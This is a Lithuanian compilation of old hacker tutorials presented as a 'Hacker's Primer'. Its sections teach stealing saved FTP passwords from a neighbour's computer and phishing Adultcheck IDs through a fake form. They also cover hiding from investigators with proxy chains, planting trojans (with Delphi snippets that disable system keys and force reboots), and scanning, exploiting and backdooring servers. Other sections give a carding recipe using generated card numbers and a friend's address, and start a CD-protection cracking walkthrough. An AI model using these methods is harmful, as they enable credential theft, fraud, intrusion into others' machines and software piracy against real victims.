Hakerio Pradziamokslis

“HAKERIO PRADŽIAMOKSLIS”

Kevino Mitniko idėjos nemirė. Visų šalių Hakeriai vienykites.

Įsivaduokime iš Matricos gniaužtų….

Straipsniai surinkti iš lietuviškų hakerių svetainių. Speciali padėka autoriams

1. Access Aproved

Senais gerais laikais, kada 486 buvo dievu kompas, zhmones kurie naudodavosi tinklo paslaugomis passwordus galvodavo tokius kaip ‘sex’,’fuck’,’peace’ ir t.t. Tada shiuolaikinis hackeris tikrai galejo ramiai tokiais passwordais pasinaudoti. Kartais Tokiu kvileliu pasitaiko ir dabar, kurie vitoj passwordo rasho savo varda, pavarde ar dar ka nors, kas susije su juo.

Kartais uzhtenka nueiti i koki http://superhacker.hypermart.net ir pazhiurejus i skiltele „apie mane” galima rasti passworda. Na kaip minejau, tokiu dabar vienetai, bet vis del to pasitaiko… Kad to ishvengti mums ishvengtume savo accountuose mums reikia susigalvoti tinkama passworda, kurio hackeris neatspes nei speliodamas, nei paleides brute force. Shtai keletas taisykliu:

1. Niekada negalvok passwordu, tokiu kaip tavo vardas, pavarde ir t.t.

2. Passwordas turi buti sudarytas ish nemazhiau kaip 6-7 simboliu. Ish ju turi buti kaichiai, didzhiosios bei mazhosios raides.

3. Niekada nespausk ant accountu loginu esanchiu skyreliu „Save my password”

4. Niekada neishsaugok passwordu savo PC visokiose passwords.txt (Tam yra galva, jei nera tai tau shakes 🙂

5. Niekada kiekvienam atskiram accountui nekartok to paties passwordo, nes jei suzhinos viena zhinos ir visus kitus.

Tai keletas patarimu. O kaip nulauzhti tuos gudruolius, kurie shiuos patarimus jau senai zhino ir ju laikosi? Na, jie tikrai gudrus, bet mes gudresni :). Tarkim mes priejome prie kaimyno kompo, kuriame yra instaliuotas CuteFTP, o shi programa buvo naudota kaimyno saitui aplaudinti. Ka mes darome?

Aishku einame i C:Program filesCuteFTP (gali buti ir kur nors kitur). Pirma suzhinokime esamos programos versija. Tarkim kaimynas turi CuteFTP v2.5. Ten tirkai bus toks failiukas kaip SMDATA.DAT, kuris ir saugo visus naudojamus FTP adresus, username’us bei beabejo passwordus, kurie buna uzhshifruoti nesunkia shifruote.

Ta failiuka mes netychia isimetame i savo senai paruoshta floopy, ir su piktdzhiugishka shypsena neshates ji namo. Namie, pasiemes alaus buteli nusikopijuojat parsineshta faila i savo cuteFTP ta pachia versija. Jusu bus paklausta ar norite irashyti atneshta faila ant virshaus, tad spauskite ‘Yes’.

Dabar pasileidzhiame savaji CteFTP ir matome , kad atsirado nauju adresu, kuriu tu ankschiau neturejai. Dabar belieka prisijungti prie vieno ish kaimyno accountu ir ka su juo darysi tai jau tavo reikalas. Bet vis del to tai dar ne pabaiga! Tarkim tu nori kaimyna dar labaiu nuliudinti ir pakeisti jo passwordo.

Pazhiurejes i accounto propertys matai, kad vietoj passworda yra irashyta kazhkokia fuflo ‘*****’. Ne beda! Tam yra visokios programos. Viena ish ju Snet Boys revelation, kuri turi pointeri, su kuriuo uzhejus ant ***** pasirodo tikras passwordas. Viskas! Tik zhiurek kad negautum nuo kaimyno i galva, uzh visokiu bjaurybiu pripaishyma jo puslpyje ;).

Dar ka norechiau priminti: Ne shtai keletas CuteFTP versiju bei failu, kuruose laikomi ju passwordia:

HOSTS.DAT – CuteFtp V. 1.x

TREE.DAT – CuteFtp V. 2.x

SMDATA.DAT – CuteFtp V. 2.5/2.6

Ir nepamirshk, kad ne tik shi programa turi tokiu failu. Turi ir kitos, tau tereikia juos surasti!

Sekmes!

2. Mazhas Adultcheck ID gavimo tutorialas

Adultchecko ID gavimas yr labai paprastas… 🙂

1.Atsidaryk Hotmailo ar usa.net emailo akaunta (pvz.hotmail@hotmail.com)

2.Naudodamasis nauju emailu atsidryk geocities akaunta

3.Susirask tikra Adultchecko saita ir nusikopijuok jo koda

4.Pakeisk taikini ish adultcheck.cgi (ar kas ten bebutu) i www.geocities.com/tavo_vartotojo_vardas.cgi – Ka shitai duoda?

Ogi ishsiunchia nieko neitarinchios aukos duomenis, ivestus i forma (pvz. ju adultcheck ID) i geocities cgi bin kuris redirektina juos i hotmail@hotmail.com.

5.Nukreipk auka i TIKRA adultchecko ID puslapi po to kai jis bus ivedes info..jiems tai atrodys kaip kox keistas nesusipratimas (dauguma windoze vartotoju yra priprate prie to ir negalvos apie tai dar karta.. netgi jei ir pagalvos, tai bus jau velu).

6.Ikishk savo nauja puslapi kur nors,tinka bet kur, netgi tavo geocities akauntas tix, tik nekishk jo i pirma puslapi – jame geriau tix kox nors „hi im mike.. I’m 15 and this is my first homepage!! isn’t it kewl!!” ir prispausdink visokio meshlo geocities kopams.

7.Viliok zhmones i savo saita… ir Valio! dabar tu esi ishdidus autentishku adultchecko ID ir passwordu savininkas…

Kelios mintys pamastymui…

Visada naudok proxy ar wingata nustatinedamas ar ieidinedamas i savo akauntus. Juk tu nenori palikti savo realaus IP bet kur, jei del kokios nors priezhasties jie noretu tave susekti.

Niekad nedek netikro puslapio savo IPT serveryje…tai papraschiausiai kvaila.

Bandydamas ivilioti potencialias aukas i savo saita, NIEKADA nesiusk spamo i tokius newsgroupus kaip alt.hackers ir t.t. pasilik tai alt.sex ir panashiam meshlui…

Galiausiai, apdenk savo klaviatura plastiku, apvyniok klavishus, kad pirshtai neliptu..ir nepaliktu pirshtu atspaudu.

Have Fun

pagal

ThePsyko

Public Enemy #7

„God told me to skin you alive”

http://prozac.iscool.net

medzhiaga paruoshe Winter Wolf.

3. Kaip anonimizuotis ir bandyti likti nepastebetam

By Craft[Eye] // http://www.underground.lt // CraftEye@gmx.net

Kai kurios savokos ir terminai:

Provider – interneto tiekejas(kaip takas)

Proxy – serveris per kuri galima jungtis norint pasiekti puslapi ir t.t.(jis padidina shansus likti nesugautam)

Logas – textinis failas kuriame saugoma visa prisijungimo, siuntimo, gavimo ir panashi informacija.

IP – na paaishkinsiu aishkiau – kiekvienas kompas turi ip sudaryta ish x.x.x.x kur 0 <= x <= 255, pagal shi skaiciu galima suzhinoti daug informacijos apie prisijungimo vieta, provaideri ir t.t..

PGP(Pretty Good Privacy) – vienas ish populiariausiu informacijos kodavimo budu.

Intro

Visu pirma ash esu gaves kelis klausymus kaip „kaip NEANONIMISHKAI nuhakinti sajta?”. Manau tikrai geras klausymas =].Ir ir ji lengva atsakyti. Jei nori nuhakinti saita ir likti pastebetas tau tiesiog reikes atsijungti visus proxy ir t.t. Ir eini prie kokio taikinio ir lauzhi. Bet kas ish to? Ka tai duos… Manau daug esmes hake yra ne tame kad shoostrai defeisisni sajta, o kad liksi nepastebetas… Nors shiais laikas yra labai sunku tai padaryti, visi provaideriai veda logus ir t.t. Na bet pameginti verta ar ne?

Kodel tau reikia saugotis?

Na pirma nuo 2000.01.01 isheis istatymas ir tada jau tu nebegalesi laisvai eiti per visus guestbookus, forumus, web boardus ir deti visu skriptus neuzhsidejas ne proxy. Antra ar tau patinka, kai kas nors skaito tavo laishkus? Manau ne. Shtai kodel anonimishkumas nedrysiu sakyti hakeriui, bet zhmogu kuris jauchia kad zhino shiek tiek daugiau uzh kitu yra labai svarbus dalykas.

Asmenybe

Niekada neishduok savo tikro vardo(na vardas nesvarbu, nors jeigu tavo vardas koks Aldevinas, o toki ash tik viena savo mieste zhinaw tai gali atitinkamai padeti tam tikriems zhmonems), amzhiaus(principo reikalas), pavardes. Manau duoti savo adresa kokiam neaishkiam zhmogui IRC ar dar kur yra ishvis didelis absurdas.

Manau visi turetu buti private virtualiame pasaulyje.

Heh atsiminkite, kad IRC butu lengva jus surasti, jei rekaujate pilna gerkle kokia tavo pavarde + pazhiureje /dns ar /whois gali pamatyti *!*@vln.dialup.takas.lt ar da ka nors turbut visiems aishku ish kur tu, o dar kai reki kokiam kanale ash Jonas Jonaitis ir t.t. Savo draugam gali pasakyti tik varda, nes esu mates pora atveju IRC kaip ei Jonai Jonaiti varysi i infobalt, taigi draugai irgi gali buti pavojingi buti.

Nickas

Nevartok to pachio nicko hackuose ir IRC. Nes tada jau lengvoka bus tave atsekti, kaip sakant STT =] darbuotojui reikes pasedeti kanale, susidraugauti su tavim ir jau tada… Na aishku jei ruoshiesi daryti, ka nors kokiam draugelio puslapiui tada manau nereikes keisti nicko, bet jei ka nors rimtai, tai tada geriau saugokis. Na jei aishku tavo draugelio tevas ne koks telekomo direktoriaus pavaduotojas.

Nickas ir ne tik IRC

Heh ish praktikos sakau – padefeisina kas sajta ir kisha i forumus hpc puslapiuose DEFACE by ME ir t.t. Manau, kad tai irgi neapgalvotas zhingsnis, nes jei neatseks tuo momentu kai hakinai puslapi ish logu atseks per forumus tavo ip(netgi yra forumuose ivairiuose moderatoriams opcija show ip, o per ju sourcus perejus ar adminam laishka parashius tikrai ip suzhinos, manau nemazhai kas). Jei reksi gerkle visuose forumuose ir wwwboarduose tai ishlysi i pavirshiu ir t.t. Cha kas sake, kad adminai nesilanko HPC puslapuose? =]

Kaip tave gali pagauti?

Ooo simple. Kai kada adminai tiks ispeja, jei nesiliausite imsimes priemoniu ir t.t. Chia geri adminai, blogi adminai kartais uzhsiima tavimi rimtai. Na o kaip jie tave pagauna, chia paprasta kiekvienas provaideris veda logus, jei jungiesi per proxy(apie tai veliau) jie gauna jo IP adresa. Na loguose dazhnai buna narshykles, pashto programos ar pan. versija, LAN kortos numeris, pribumbasiu visokiu – bet svarbiausia ip adresas.

Paprasciausia situacija – tu nupyliai puslapi, adminas susinervina, pasizhiuri logus – aha tako ip numeriai, gerai. Pasiima savo mobilu ir surenka koki telekomo telefona > tai padaro 3 val(jei neklystu ne 100% informacija) begyje > tada telekomo dedez pasako telefona ir adresa ant kurio uzhregistruotas telefonas.

Kaip jau sakiau geras adminas paskambins ir ispes tave, blogas adminas paprashys telekomo, kad atjungtu tau telefona – shis taip ir padarys, o jei dar skolu uzh telefona turejai – viskas. Ir sedek zhmogus be telefono, kaip akmens amzhiuje. Chia tik pavyzdys…

Jei jungsies per proxy, tada adminas parashys draugishka laishka proxy savininkam, jei negaus logo duomenu tada adminas pasakys, kad rimtas reikalas pateiks irodymus ir panashiai, tada proxy davininkas isako adminam duoti duomenis… Tada pamato blogasis adminas, kad per proxy jungtasi ish dial-up, tada jau istorija kartojasi…

4. Proxy

Na papraschiausias budas paslepti savo ip adresatai jungtis per proxy. Visur kur jus lankysites : kaip jau minejau forumuose, wwwboarduose ir t.t. bus rodomas proxy ip. Tai labai smarkiai nepadidins galimybes buti nepagautam, bet shiaip del nekalto browsinimo tai labai naudinga.

Kaip konfiguruoti jusu IE,NETSCAPE ar OPERA rekomentuosiu… Tai gana lenga(susirasit patys kaip sakant). Shiaip proxy naudoja du portus 80 ir 8080. Proxy adresas dazhniausiai atrodo taip : proxy.anonimyzer.com ar panashiai. Proxy hakui nera taip pat saugu del jau minetu priezhaschiu.

Geriausiai daryti proxy grandine turiu omeni pvz: dial-ip > proxy1.bmw.com > proxy3.audi.com > proxy2.stt.com =] ir paashiai, na bet chia reikes sugebeti padaryti… O tada jau adminam bus sunkiau atsekti tave, jie painiuosis(kuo daugiau proxy tuo geriau). Dar viena nezhymi detale > tik nenaudok skirtingu proxy nuo vieno providerio > kaip proxy.5ci.lt > proxy1.5ci.lt ir t.t. Zhodzhiu proxy bootinas…

E-mail

Apie laishkus trumpai. Jei nenori, kad provideris skaitytu tavo pashto ir pan. Papraschiausiai koduok juos. Yra dabar visokie PGP(Pretty Good Privacy) plachiau www.pgp.com. Gali aishku su draugu sugalvoti savo kalba ir t.t. =]]

Na menka, bet reikshminga detale > nenaudok provaideriu savoje shalyje. Jie tikrai supras tau rashomu laishku turini. O jau provaideriai uzhsienije, kokioje Japonijoje ar USA/CANADA niekas tikrai nesupras lietuviu kalbos > nereiks nei PGP:). Be to uzhsienio meilai patogesni ir galingesni nei Lietuvos provideriu(musu mylimas puslapiukas www.takas.lt :).

Pabaigai

Zhodzhiu chia aptariau tik kelis budus kaip apsisaugoti ir kaip tave gali pagauti, bei zhinoma svarbiausia, kad nejaustum baimes, kad tavo laishkus skaito koks nors adminas ir juokiasi :). Kaip sakoma atsargiausias – mobiliausias ar kaip ten. Shiaip manau ishpuikimas ir norejimas parodyti save labai PADIDINA shansus, kaip buti sugautam. Ir smarkiai. Ir jei nori parekti koks ash esu ir kad ash sajta „padariau” tai pasiroopink anonimishkumu. Manau ir be to turi galva ir pasiroopinsi anonimishkumu ir nereksi kur papuola „HACKED”. O poto adminas sakys you’re FUCKED… Nu chia lyrinis nukripimas. Zhodzhiu pagalvokite priesh darydami…

Last Message: Anonimas yra niekas, nes jo papraschiausiai nera…

Original text by Craft[Eye] // CraftEye@gmx.net

2000(c) Special for www.underground.lt nu jus supratot ane?

5. Trojos arkliukai arba kaip jie veikia?

Trojos arkliukai (arba kaip jie veikia)

Turbūt daugelis iš jūsų žino kas yra trojanai. Bet ne visi žino kaip jie veikia. Jei hackeris nenutuokia kas yra IP arba portai tegu verčia kitą puslapį. Jei ne, tai kaip sakoma – važiuojam :).

Daugelis iš jūsų turbūt yra žaidę su trojanu(įsivaizduoju vargšo lamerio veidą, kai jam atsidarinėja cd-rom’as ir kaip jis bėga pas kanors pagalbos arba kiša diskelį su 1990 metų Dr.Web :)) Visų pirmą, jie dirba tinklu, dažniausiai TCP/IP protokolu, nes jis popiuliaraiusias juo sukasi Inetas, ir kad kitas žmogus būtų „užsikrėtęs” Trojos arkliuku jam reikia jį gauti ir paleisti.

Žmones dažniausiai gauna trojaną e-muilu arba IRC – čia populiariausi būdai (na žinoma tu gali nueiti pas savo draugeli ir pasakyti va čia geras geimas nori?

Geras draugas žinoma neatsisako – po tris kartus paleisto „žaidimo” tu jam pasakai, kad turbūt sugedo diskelis! :)) Kai tik paleidi Trojos ponį, jis tuoj perkopijuoja save į C:Windows ir t.t., įsirašo savo paleidėją į kokią nors sisteminę vietelę – rejestrą, kokį nors sisteminį failą(win.ini ir pan.), gudresni išvis gerai daro – susikuria tokį failą su plėtiniu *.VxD(Virtual Extended Driver ar pan.:)) ir nukopijuoja failiuką į c:WindowsSystem, o toliau kai kompas kraunasi Windozai tiesiog „paleidžia” visus *.VxD failiukus.

O tada musų draiveris jau paleidžia išsvajotąjį trojaną:). Pusę darbo jau atlikta(jei aišku pas auką nėra ten kokio Norton Doktor Vebas 3000 Milenium Super Profesional Special Edition 😉 – bet ir tai kaikada nepadeda, jei geras trojanas:)). Lieka sužinoti aukos IP – čia jau kaip iš bobutės rankinę atimti(kai kuriais atvėjais).

Jei niusiuntei trojaną mIRC’u, tai tiesiog parašai /dns to_kuriam_nusiuntei_trojana_nikas – ir parašo tau jo IP, jei paštu sunkiau – bet kai kurie poniai siunčia IP adresą į pasirinkt’a muilą, jei tu nori pažaist su draugelio kompu – run kortelėje parašai winipcfg(jei WinNt tai – wintipcfg:)).

Sužinai jo IP /valio/ paleisk savo kompe vadinamąjį Remote Control’a (tik netą dalį su siurprizas.exe), o tą dalį su kuria valdysi aukos kompą.

Ten būna toks laukelis IPHost ar dar kas nors – įrašai skaičiukus arba host vard’a – pvz 0.0.0.0(IP adresą, o ne savo gimimo datą kaip esi pripratęs daryti kai pildai anketą dėl nemokamo cd :)) Spaudi mykoliuką konekt ir jei parašo „succesfuly connected to 0.0.0.0” ar panašiai – tada jau prasideda:).

Jau gali būti BEVEIK įsitikinęs kad žaisi su kažkieno kompu. Kodėl beveik? Todėl, kad serveris ar dar kas nors gali būti password protected(pvz senasis NetBus trojanas sugeba prisijungti prie savo serverio, gali gauti failų sąrašą, bet kai bandai trinti failiuka win.com 🙂 arba atidaryti cd-rom NetAutobusas sako kad serverio kompas apsaugotas nuo redagavimo su password’u ar kokia programa:( ). Bet jei jau sugebėjai prisijungti, 9 atvėjais 10 tu jau naujasis kompo adminas :)). O įvairių trojanų galimybės neregėtos:

1. Valdai kompo failų sistemą.

2. Valdai rejestrą.

3. Kontroliuoji visus įrenginius(gali net atspauzdinti tekstą „hi lama” su aukos printeriu, jei jis įjungtas arba valdomas programiniu būdu t.y. neturi on/off mygtuko :)).

4. Gali peržiūrinėti ekrano vaizdą ir paspausti mygtuką su užrašu X lamos ekrane :).

5. Jei jis dirba kokiame nors WinWord gali jam tiesiai į jo redaguojamą vietą parašyti kokį eilėraštuką.

6. Gauti password’us :).

7. Įrašinėti jo renkamą tekstą klaviaturoje(nebijokite negausi jokių ************* vietoje freexxxvideos :))))).

8. Ir išvis daryti ką nori.

Ir dar daug daug įvairių galimybių. Bent aš asmeniškai rekomenduoju „ten” ikišti kokius 4-3 trojanus ir tada išvis jėga(juk visi Trojos arkliukai skirtingi).

Beje trojanai dažniausiai naudoja WinApi funkcijas(tokias kaip ExitWindowsEx() – jos tinka bet kokiai programavimo kalbai nuo Asemblerio iki VC++ ir Delphi, nes jas realizuoja ne programa, o Windozai, jas tik reikia iškviesti :)). Galiu pademonstruoti kelias jų, jei bandysite patys daryti savo trojaną(pavyzdžiai Delphi sintaks, bet tikram hackeriui juk nesunku išversti iškalbos į kalbą, jei kalba ne kokia VC++ ir ją verti į Asmeblerį:)) kaip duomenys perduosi tinklu- tavo reikalas, o kaip badaryti kelis triukus aš tau parodysiu:

Pavyzdžiui reikia perkelti kursoriu į kitą vietą:

SetCursorPos(x ašies kordinatė,y ašies kordinatė) – apie x,y mokeisi mokykloj, jei ne bandyk įdomesnį variantą :

Randomize;

SetCursorPos(Random(Screen.Width),Random(Screen.Height));

Efektas nuostabus. Perkels kursorių į betkurią ekrano vietą:). Nori perkrauti kompą, išjungti – jokių problemų:

ExitWindowsEx(flagas,0); vietoje žodžio flagas rašyk:

Jei nori perkrauti kompą – EWX_REBOOT, išjungti – EWX_POWEROFF, atsijungti nuo esamo vartotojo – EWX_LOGOFF. Va, visa artilerija :).

Ką dar įdomaus galima padaryti hmm pagalvokime… Sugalvojau – paleisti programą :

WinExec(‘programos pavadinimas’,1); Tos kabutės reikalingos 😉

Beje mano pirmojo trojano pagrindinė funkcija buvo paleisti 1000 notepad’ų. Skamba paprastai, bet vaizdas nepakartojamas:). Jei nori ko nors įdomesnio – prašau, sisteminių klavišų atjungimas:

PROCEDURE TurnSystemKeysOff;

VAR

dummy: INTEGER;

BEGIN

SystemParametersInfo(97, INTEGER(TRUE), @Dummy, 0);

END;

Taip pat galėsi juos ir įjungti:

PROCEDURE TurnSystemKeysOn;

VAR

dummy: INTEGER;

BEGIN

SystemParametersInfo(97, INTEGER(FALSE), @Dummy, 0)

END ;

Na dabar aukai galėsi padaryti tikrai cirką, jis vargšas metysis į šalis – jam ekrane vien notepad’ai, negana to kursorius mėtosi į visas šalis(kaip jis kryžiuką paspaus?:)), jo vienintelė viltis Ctrl + Alt + Del ir taip uždaryti visus notepad’us – bet kas gi čia neveikia nei vienas sisteminis klavišas lieka viena išeitis perkrauti „su protu susipykiusią, kvailą mašiną” , bet jam ir vėl vargti nereikės – kompas staiga pats persikrauna – viskas jis formatuoja hard’a. 🙂 Linksma ar ne? Aš irgi taip manau.

Manai, kad trojanai labai piktas dalykas – iš dalies taip. Kai supranti kaip jie veikia jį lengviau pašalinti, bei supranti jo keliamą pavoju tavo kompiuteriui! Beje Trojos poniai gali ir pasitarnauti – yra žmonių kurie adminisruoja nutolusius kompus su trojanais.

Ir dar – jei patys nenorit, tingit rašyti savo trojanų parsisiūskit kokius 5 ir susiraskit aukų. Trojanų pilna internete. Aš rekomenduočiau SubSeven gold ar dar kokį iš tos serijos(mano mylimiausias), taip pat DeepThroat 3,1 ar naujesnę versiją vertėtų parsisiųsti. Na kaip nepaminėsi senbuvių – BO2k(Back Oriface 2000) ir NetBus Pro. Dar yra įvairių įvairiausių. Manau pilniausią jų sarašą galit peržiūrėti galite Web puslapyje http://www.tlsecurity.net/amt.htm ten yra pilnas daugelio trojanų aprašymas ir būdai kaip jį panaikinti :).

Na ką draugai hackeriai aš su jumis. Jei ką rašykit! Tikiuosi straipsnis patiko! Jei ne, ką padarysi ne visiem įtiksi, jei ką rašykit man į muilą.IKI Gero Hack’o!

Craft[Eye] – CraftEye@gmx.lt

6. Hackingas ir cardingas ZHALIEMS

Sitam texte pateikiami *TIK* pagrindai . Tai visai nereishkia, kad jie gali buti visur sekmingai panaudoti . Ash(autorius) neatsakau uzh jokia zhala, kuria JUS pridarysite naudodami shia medzhiaga . Ash neskatinu nei isilauzhimu nei cardingo ir nereishkia kad ash tuo uzhsijimu jei rashau toki texta .

1.Hakingas

1.1.Serveriu hakingas

Serveriu hakingas susideda ish keliu etapu :

1.Portu skanavimas

Siunciami paketai i tam tikra serveri ir ieshkoma atidaru portu . Skaneriai gali buti padaryti per cgi (RI7S toolzai) ar veikti tiesiai jusu kompe . Yra skaneriu beveik visoms sistemoms . Vienas gereusiu ant UNIX tipo sistemu(linux,minix,AIX,SunOS)

veikianciu skaneriu yra nmap (www.insecure.org) . Yra skaneriu ir ant win9x bei winNT bet jie yra labai ribotu galimybiu, bet savo funkcija atlieka .

2.Servisu aptikimas pagal portus

Tam yra servisu pagal portus sarashai bet ir be ju daug kam zhinoma, kad pvz WWW servai eina ant 80 porto .

3.Servisu serveriu versiju nustatymas

Reikia telnetintis i tam tikra porta . Jei nemokat(?), tai i FTP(21 portas) galit prisiko-

nektint naudodami paprashciausia FTP client’a ir jum dazniausiai parashys versija .

4.Exploitu tom versijom ieshkojimas

Nu susirandat ir uzhrashot visu servisu versijas ir puolat ieshkot exploitu inete .

Nu galit eiti i astalavista.box.sk(ar www.av.com) ir rasykit „exploits” gal surasit saita kuri pamegsit . O gal jau toki turit . Nu sheip keli exploitai yra mano megstamam lietuvishkam saite ri7s.cjb.net . Bet ten yra tikrai ne visi exploitai .

5.Exploitinimas

Tada imat ir konkektinates prie savo linux shell’o ir kompiliuojat exploita .

Yra ir komplieriu ant windows bet ash tuo nesidomejau . Jei neturit shell’o nueikit

(Klaipedoj) i KU ir jums tikrai duos . Jei gyvenat kitam mieste tai galit prashyt kietesniu pazhystamu . Zhodzhiu cia jusu reikalas kaip susikompailint …

6.Backdoorinimas

Instaliuojat koki rootkita priesh tai pasidomeje juo(RTFM) . Galit koki norit kita trojana ajshku . Nu pasiieshkokit .

Nu jau ir turit access ant serverio . Gal eggdrop’u statyt nepulkit, bet … =]

1.2.Windoze peremimas ( Ce apie access ant windoze kurio owneris yra 101% lamah .

Kitaip neveix :[ )

Tai wo . Imat kokia progshe . Nu trojana . Surandat SERVER dali bet jos nepaleidzhiat, o ikishat kokiam lamah . Placiau : Susitinkat per IrC ir sakot : „ei xebrantas !

Ar tik nenori hakeriu but ??? Imk zhek cia galesi isilausht i kompus su tokia programa ! „

=] Lamah paima jusu SERVER’i . Executina . Jus executinat CLIENT trojano dali ir konek-

tinaties prie lamoz . Tada siulyciau i sisteminius failus ivaryti koki kita trojana .

Nu cia reikalinga todel, kad jei pirma trojana suras . Nu yra tokios programeles kuriu anti-

virus negaudo . Jos nevadinamos TROJANAIS o gali buti panaudotos tam . Oficialiai ir trojanai vadinasi REMOtE ADMINISTRATION toolz . Taigi ieshkokit komerciniu toolz’u crack’inkit …

Keli patarimai : neikit savo niku, naudokit proxy ir raukites tik ant 24/7/365 access’a prie ineto turinciu kompu .

2.Cardingas (*DEMESIO* sita draudzhia lietuvos istatymai)

1.Imat netscape ir instaliuojat

2.Paleidziat

3.Susirandat WWW proxy kruva .

4.Sukonfiginat kad veiktu per proxy grandine (proxy.ktu.lt:8080//proxy.com:81//proxy.jp ir paskutinio serverio porta porto vietoj) . Uzh tai ash dekingas vienam xebrantui kurio zhinute pastebejau RI7S BB .

5.Imat CC# generatoriu ir darot CC# .

6.Konektinates prie saito kuriam zhadat pirkt .

7.Susitariat su draugeliu, kad nesakys niekam, kad pas ji atejo kokia preke .

8.Rashot savo varda ir pavarde, CC#, draugelio adresa tikra .

9.Zhiurit kad prekiu verte nevirshytu 700Lt nes nereikia muito moket iki ~tiek .

10.Laukiat prekiu ir niekam nesake pasiimat is draugo dezhutes cheki nueinat i pashta ir pasiimat preke .

11.Jei kas, draugas sako kad nieko nebuvo ir kad jis taves nepazhysta .

Taigi kolkas viskas, bet kaip zhaliems turetu uzhtekt tokio gaido .

Written in 2000/07 by jogis

7. Pasirasyk savo CGI maileri

Manau daugelis noretu moketi padaryti cgi pasto programa, ar ka nors panasaus, kas dirba su socketais.

Zemiau pateikiu su komentarais gabaleli skripto, kuris siuncia email`a.

############## Duomenys gauti is formos ###########

$from=$FORM{‘from’};

$to=$FORM{‘to’};

$subj=$FORM{‘subj’};

$msg=$FORM{‘msg’};

($x,$x,$x,$x, $here) = gethostbyname($null);

($x,$x,$x,$x, $there) = gethostbyname($smtp_server);

$thisserver = pack(‘S n a4 x8’,2,0,$here);

########### Priespaskutinis kintamasis- konstanta yra portas (25)

$remoteserver = pack(‘S n a4 x8’,2,25,$there);

############## Kuriam soketa #######################

(!(socket(S,2,1,6))) && (&error(„SMTP EMAIL: Connect error! socket”));

############## subindinam ##########################

(!(bind(S,$thisserver))) && (&error(„SMTP EMAIL: Connect error! bind”));

############## konektinames su serveriu ############

(!(connect(S,$remoteserver))) && (&error(„SMTP EMAIL: connection to $smtp_server has failed!”));

################# parenkam/ sukeiciams deskriptorius select(S);

$| = 1;

select(STDOUT);

################ skaitom soketo (serverio) ir tikrinam ar nera klaidu

$DATA_IN = ;

($DATA_IN !~ /^220/) && (&error(„SMTP EMAIL: data in Connect error – 220”));

################### toliau viskas vyksta #################

################### paprasciausiai perdavinejan #################

################### smtp servui komandas #################

print S „HELO tavo_hostasrn”;

$DATA_IN = ;

($DATA_IN !~ /^250/) && (&error(„SMTP EMAIL: data in Connect error – 250”));

print S „MAIL FROM: $fromn”;

$DATA_IN = ;

($DATA_IN !~ /^250/) && (&error(„SMTP EMAIL: $emailfrom address not valid”));

print S „RCPT TO: $ton”;

$DATA_IN = ;

($DATA_IN !~ /^250/) && (&error(„SMTP EMAIL: $recipient address not valid”));

print S „DATAn”;

$DATA_IN = ;

($DATA_IN !~ /^354/) && (&error(„SMTP EMAIL: Message send failed – 354”));

print S <;

($DATA_IN !~ /^250/) && (&error(„SMTP EMAIL: Message send failed – try again – 250”));

print S „QUITn”;

8. Coll www

Pasidaryk šustrą puslapi Pasidarei shustra puslapi? Apie ka jis? Nuogas merginas, mashinas, kompiuterius, ju lauzhyma… Na nesvarbu. Svarbu, kad tavo www yra geras ir todel tau reikes ji patalpinti geoj vietoj ( kalbu ne apie kuno daly :). Internetas dabar prikimshtas visokiu redirektu, vietu puslapiams bei kitu patogiu dalykeliu. Shiame straipsnyje ash papasakosiu kaip atsikratyti daugelio nervinanchiu baneriu, kur patalpinti savo puslapi, kur gauti gera redirekta ir net kaip uzh veltuj gauti DOMANA! Pradekime nuo patalpinimo… Shtai tarkim hypermart.net. Duoda tau adresa „vardas.hypermart.net”. Galesi siusti 20 megu, bet kiekvienam tavo puslapyje metys labai nervinanti baneri, kurio labai paprasta atsikratyti.

9. Crack

Sitame tutoriale, as jums parodysiu kaip nulauzti, CD apsauga, naudojant Win32Dasm ir Hiew.

Na ka, pradedam:

Visu pirma, jus privalote paleisti ta zaidima, kuri jus norite nulauzti, be CD. Na aisku zaidimas nepasileis, (Prasau tik nepanikuokite:), viskas, ka jus pamatysite tai, isokanti lanaga kuris pranesa „gera naujiena”.

Na ka si zinute tai tikrai gera naujiena, nes ji mums ir pades patvarkyti ta nelemta zaidima, taigi viskas ka jus siuo metu turite atsiminti, tai ta zinute, kuri jums pranese, kad reikalingas CD.

Pavyzdziui: Please insert the – CD, arba: You need the CD to play the *** .( ***, yra zaidimo pavadinimas, kuri jus norite nucrackinti). Beje jei jus esate su ribotu atminties kiekiu savo galvoje, ir nesugebate atsiminti sios zinutes kuri praso CD, tai uzsirasykite ja, ant kokio nors popiergalio.

Taigi dabar pasileiskite Win32Dasm, ir atsiradusiame lange paspauskite DISASSEMBLE, po to isokusiame meniu, pasirinkite OPEN FILE TO DISSASSEMBLE. Atsiras kitas langas, kuriame jus turesite susirasti to zaidimo exe faila, kuri norite nucrackinti. Kai tai atliksite, prades begti tokia eilute, taigi tai ustruks kelias minutes, taigi siulau pramankstinti savo kojeles ir patraukti kur karaliai pesti vaiksto:).

Na ka baigesi? NE, na gerai dar palaukim, na kaip dabar? na OK procesas baigtas. Dabar jusu ekrane turejo atsirasti keistas tekstas, kurio mes visiskai nesuprantam:). Nesijaudinkite, vienintelis dalykas kuri dabar jus turite padaryti, tai susirasti antra mygtuka esanti is desines (String Data Reference), kuris yra salia printerio mygtuko.

Dabar jus matote langa kuriame surasytos ivairios zinutes ir panasiai. Taigi susiraskite ta zinute kuri prase CD ir paspauskite du kartus ant jos. Uzdarykite STRING DATA REFERENCE langa. Dabar jus esate nebe kodo pradzioje, o kazkur viduryje ar kazkas tokio, kiekvienu atveju vis kitaip. Taigi dabar jusu ekrane turi matytis ta zinute kuri praso kompakto. Dabar pati svarbiausia vieta. Kilkite i virsu, nuo tos zinutes, kol pamatysite kazka panasaus:

* Referenced by a (U)nconditional or (C)onditional Jump at Address:

|:00410545 (c)

Jusu atveju skaicius bus aisku kitoks, bet bendras vaizdas turi buti panasus. Susirade tai, paspauskite Goto(Win32Dasm virsuje), atsiradusiame meniu pasirinkite Goto Code Location ir parasykite si skaiciu, mano atveju tai 00410545 ir spauskite OK. Taigi jus vel kazkur nusokote, dabar nejudedami is vietos, nusirasykite skaiciu esanti Win32Dasm apacioje, kuri atrodo taip (isskyrus skaiciai):

Line:34040 Pg 401 of 409 Code Data @:0041052F @offset 0000F945h in File:

